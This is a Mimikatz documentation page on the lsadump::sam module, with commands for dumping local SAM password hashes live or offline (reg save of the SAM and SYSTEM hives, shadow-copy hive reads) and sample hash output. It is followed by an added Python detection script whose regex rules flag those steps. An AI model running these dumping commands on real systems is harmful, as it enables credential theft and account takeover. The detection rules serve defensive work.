sam
lsadump::sam dumps the local Security Account Manager (SAM) NT hashes (cf. SAM secrets dump). It can operate directly on the target system, or offline on backups of the SAM and SYSTEM registry hives. It takes the following command line arguments:
  • /sam: the offline backup of the SAM hive
  • /system: the offline backup of the SYSTEM hive
LM and NT hashes are used to authenticate accounts with the NTLM protocol. These hashes are often loosely called "NTLM hashes", and much documentation, many blog posts and many tools mix the terms. In the output below, "NTLM" refers to the NT hash.
This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).

Dumping the target

mimikatz # lsadump::sam
Domain : DC
SysKey : 7852ea75b3b8c4093fbda3f618a045bb
Local SID : S-1-5-21-97532702-2134717100-614679475

SAMKey : 7a87c9ff42815d7d1cead9fe84db22ba

RID : 000001f4 (500)
User : Administrator
Hash NTLM: 4d01f91984530f183381bdf5f0605f63

RID : 000001f5 (501)
User : Guest

RID : 000001f7 (503)
User : DefaultAccount

Offline dumping

First, backups of the SYSTEM and SAM hives must be obtained:

reg save HKLM\SYSTEM system.hive
reg save HKLM\SAM sam.hive
A Volume Shadow Copy or a boot CD can also be used to back up the hive files themselves:

C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SAM
The saved SYSTEM and SAM hive backups can then be used offline:

mimikatz # lsadump::sam /system:system.hive /sam:sam.hive
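Detection of the procedure above, as an added example that is not part of the Mimikatz documentation: it runs a few regex rules over constructed Sysmon-style process-creation records (the field names, users and command lines are assumed sample data) to flag reg save of the SAM/SYSTEM hives, the lsadump::sam module invocation, and hive reads out of a Volume Shadow Copy, and it reports users who exported both hives, since the offline method needs both.

```python
import re
from collections import defaultdict

# Constructed sample process-creation records (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"User": "CORP\\admin", "CommandLine": r"reg save HKLM\SAM sam.hive"},
    {"User": "CORP\\admin", "CommandLine": r"reg  save hklm\system system.hive"},
    {"User": "CORP\\svc", "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft"},
    {"User": "CORP\\admin", "CommandLine": r'mk.exe "privilege::debug" "lsadump::sam" exit'},
    {"User": "CORP\\backup", "CommandLine": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\tmp\SAM"},
    {"User": "CORP\\user", "CommandLine": r"reg save HKLM\SOFTWARE\Microsoft office.hive"},
]

# One rule per step of the page's procedure: hive export with reg save,
# the lsadump::sam module itself (whatever the binary is renamed to), and
# raw hive files read out of a Volume Shadow Copy.
RULES = {
    "sam_or_system_hive_export": re.compile(
        r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(sam|system)\b", re.I),
    "mimikatz_lsadump_sam": re.compile(r"lsadump::sam", re.I),
    "shadow_copy_hive_read": re.compile(
        r"harddiskvolumeshadowcopy\d+\\windows\\system32\\config\\(sam|system)\b", re.I),
}

def match_event(event):
    """Return the names of all rules whose pattern hits this event's command line."""
    cmd = event.get("CommandLine", "")
    return [name for name, rx in RULES.items() if rx.search(cmd)]

def scan(events):
    """Flag individual events; each hit carries the user and the matched rule names."""
    hits = []
    for ev in events:
        names = match_event(ev)
        if names:
            hits.append({"user": ev["User"], "rules": names})
    return hits

def users_exporting_both_hives(events):
    """Offline dumping needs BOTH hives, so a user who exported SAM and SYSTEM
    is a stronger signal than either export alone (backup tooling can still
    do this legitimately, so treat it as a triage priority, not proof)."""
    hives = defaultdict(set)
    rx = RULES["sam_or_system_hive_export"]
    for ev in events:
        m = rx.search(ev.get("CommandLine", ""))
        if m:
            hives[ev["User"]].add(m.group(1).lower())
    return sorted(u for u, h in hives.items() if h >= {"sam", "system"})
```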